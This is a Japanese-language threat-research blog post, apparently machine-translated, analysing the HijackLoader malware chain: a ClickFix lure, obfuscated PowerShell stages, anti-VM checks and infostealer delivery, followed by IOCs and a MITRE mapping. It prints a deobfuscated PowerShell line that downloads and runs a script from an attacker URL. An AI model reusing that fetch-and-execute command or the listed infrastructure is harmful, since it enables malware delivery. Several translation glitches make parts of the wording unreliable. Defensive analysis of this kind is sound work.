目次
- イントロダクション
-
- 進化する攻撃ローダーの脅威
-
- このブログの目的
- 技術的方法論と分析
-
- 初期アクセスとソーシャルエンジニアリング
-
- 多段階の難読化と難読化解除
-
- 分析回避技術
-
- 最終ペイロード
- 結論
- IOC
- クイックヒール \ Seqrite プロテクション
- MITRE ATT&CK マッピング
イントロダクション
サイバー脅威の進化に伴い、悪意のあるペイロードの最終的な実行は、もはやサイバーセキュリティ業界の唯一の焦点ではなくなりました。攻撃ローダーは、現代の攻撃において重要な要素として浮上し、初期アクセスの主要なベクトルとして機能し、組織内への高度なマルウェアの密かな配信を可能にしています。単純なペイロードとは異なり、ローダーはセキュリティ防御を回避し、永続性を確立し、最終段階のマルウェアを密かに実行するための好ましい環境を作り出すという、明確な目的を持って設計されています。そのため、ローダーはより重要かつ関連性の高い脅威となり、集中的な分析が求められます。
最近、 ハイジャックローダー マルウェア。まず 登場 2023年後半に 獲得 ペイロードを配信する能力と、それをロードして実行する興味深い技術によって注目を集めています。多くの場合、 サービスとしてのマルウェア、となっていた 観測された 主に世界規模で金銭目的のキャンペーンを展開しています。
HijackLoaderは、 偽インストーラー、SEO対策 ウェブサイト、マルバタイジング、海賊版ソフトウェア/映画ポータルこれにより、広範囲かつ機会を狙った被害者基盤が確保されます。
2025年XNUMX月以降、Clickfix を利用して、何も知らない被害者に悪意のある.msi インストーラをダウンロードさせ、HijackLoader を実行させる攻撃者が確認されています。DeerStealer は、被害者のマシンに最終的な実行ファイルとしてダウンロードされたことが確認されています。
最近、TAG-150 が CastleLoader/CastleBot とともに出現し、より広範な Malware-as-a-Service エコシステムの一部として HijackLoader などの外部サービスも活用していることも確認されています。
HijackLoaderは頻繁に配信します スティーラーとRAT 常にその技術を洗練させています。特に、以下のような高度な回避技術で悪名高いです。
- トランザクションセクションとのプロセスのドッペルゲング
- システムDLLのアンフック
- WOW64 での直接システムコール
- コールスタックスプーフィング
- VM対策チェック
HijackLoaderは発見以来、継続的に進化を続け、様々な業界にとって持続的かつ増大する脅威となっています。そのため、組織は、高度な多段階攻撃のリスクを軽減するために、HijackLoaderの継続的な監視体制を確立し、維持することが不可欠です。
感染連鎖
技術概要
最初のアクセスは CAPTCHA ベースのソーシャル エンジニアリング フィッシング キャンペーン。Clickfix として識別されています (この手法は、2025 年 XNUMX 月にも攻撃者によって使用されていることが確認されています)。
この HTA ファイルは最初のダウンローダーとして機能し、PowerShell ファイルの実行につながります。
上記の Base64 エンコードされた文字列をデコードすると、次に示すように別の PowerShell スクリプトが取得されました。
上記のデコードされたPowerShellスクリプトは高度に難読化されており、静的分析やシグネチャベースの検出にとって大きな課題となっています。判読可能な文字列や変数を使用する代わりに、複雑な数学演算と文字配列からの文字列の再構築を通じて、コマンドと値を動的に構築します。
上記のペイロードを解決すると、以下のコマンドにデコードされますが、まだ判読できませんが、完全に難読化を解除できます。
完全な難読化解除後、スクリプトが URL に接続して後続のファイルをダウンロードしようとしていることがわかります。
iex ((New-Object System.Net.WebClient).DownloadString('https://rs.mezi[.]bet/samie_bower.mp3'))
デバッガーで実行すると、このスクリプトは URL に接続できないことを示すエラーを返します。
ファイル サミー・バウアー.mp3 これは別の PowerShell スクリプトであり、18,000 行以上にもなり、高度に難読化されており、ローダーの次の段階を表します。
デバッグを通じて、このPowerShellファイルが多数の アンチVM 実行中のプロセスの数を検査したり、レジストリ キーを変更したりするなどのチェックを行います。
これらのチェックは、特にターゲットを絞って読み取るようです VirtualBox識別子 スクリプトが仮想化環境で実行されているかどうかを判断します。
スクリプトを分析すると、最終的なペイロードが最後の数行に存在することがわかりました。これは、最初の難読化されたローダーが最終的な悪意のあるコマンドを配信する場所です。
上記の意味不明な変数宣言は解決されており、実行時に Base64 デコード、XOR 演算、追加の復号ルーチンが実行され、その後、PE ファイルを挿入する可能性のある別の PowerShell スクリプトが読み込まれます。
このファイルをデコードすると、埋め込まれたPEファイルが明らかになり、 MZヘッダー.
このPEファイルは、非常に圧縮された .NET 実行ファイル.
実行可能ペイロードは、リソース セクションから抽出されたと思われる大量のコードをロードします。
解凍されると、実行可能ペイロードが DLL ファイルをロードするように見えます。
この DLL ファイルも保護されており、リバース エンジニアリングや分析を防止するものと考えられます。
ハイジャックローダー このローダーは、実行ファイルとそれに続くDLLを含む多段階のプロセスを使用するという歴史があります。この最終段階では、C2サーバーへの接続を試み、そこから 情報窃盗マルウェア ダウンロードされると、マルウェアは以下のURLに接続しようとします。
このC2にはアクセスできなくなっていますが、接続の試みは NekoStealerマルウェアこのHijackLoaderは、Lummaを含むさまざまな窃盗型マルウェアのダウンロードにも関与しています。
結論
HijackLoaderのような高度なローダーから効果的に防御するには、静的な最終段階のペイロードから、動的かつ継続的に進化する配信メカニズムへと焦点を移す必要があります。初期アクセスと難読化の中間段階の検出に注力することで、組織はこの執拗な脅威に対するより強固な防御を構築できます。初期アクセスや最終ペイロードのみに焦点を当てるのではなく、すべての層にわたってプロアクティブなアプローチを採用することも同様に重要です。中間層は、攻撃者がマルウェアの展開を成功させるために最も大きな変更を加える場所であることが多いからです。
IOC:
- 1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57
- 37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4
- 3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df
- 782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d
- 921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184
- e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82
- 52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd
- c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e
- D0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4
- 50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee
- hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta
- 91 [。] 212 [。] 166 [。] 51
- 37[.]27[.]165[.]65:1477
- コシ[.]コム[.]アル
- hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3
- hxxp[:]//77[.]91[.]101[.]66/
クイックヒール \ Seqrite 保護:
- スクリプト.トロイの木馬.49900.GC
- ローダー.スティーラードロッパーCiR
- Trojan.InfoStealerCiR
- トロイの木馬エージェント
- BDS/511
MITRE 攻撃:
| 戦略 | テクニックID | 技名 |
| 初期アクセス | T1566.002 | フィッシング:スピアフィッシングリンク(CAPTCHAフィッシングページ) |
| T1189 | ドライブバイコンプロマイズ(マルバタイジング、SEOポイズニング、偽インストーラー) | |
| 実行 | T1059.001 | コマンドおよびスクリプト インタープリター: PowerShell |
| 防衛回避 | T1027 | 難読化されたファイルまたは情報(多段階の難読化スクリプト) |
| T1140 | ファイルまたは情報の難読化解除/デコード(Base64、XORデコード) | |
| T1562.001 | 防御を弱める: ツールを無効化または変更する (DLL のアンフック) | |
| T1070.004 | インジケーターの削除: ファイルの削除 (ステージングローダーで使用される可能性が高い) | |
| T1211 | 防御回避のためのエクスプロイト(WOW64 での直接システムコール) | |
| T1036 | マスカレード(PowerShell スクリプトの .mp3 などの偽の拡張子) | |
| プーケットの魅力 | T1082 | システム情報の検出(VM チェック、レジストリ クエリ) |
| T1497.001 | 仮想化/サンドボックス回避: システム チェック | |
| 固執 | T1547.001 | ブートまたはログオン時の自動実行: レジストリ実行キー (レジストリの改ざん) |
| 永続性 / 特権 Esc。 | T1055 | プロセスインジェクション(PEインジェクションルーチン) |
| コマンドアンドコントロール(C2) | T1071.001 | アプリケーション層プロトコル: Web プロトコル (HTTP/HTTPS C2 トラフィック) |
| T1105 | Ingress ツール転送 (追加のペイロードのダウンロード) | |
| インパクト/コレクション | T1056 / T1005 | 入力キャプチャ / ローカル システムからのデータ (最終ペイロードの情報窃盗機能) |
著者:
ニラジ・ラザラス・マカサレ
シュルティルパ・バナージー
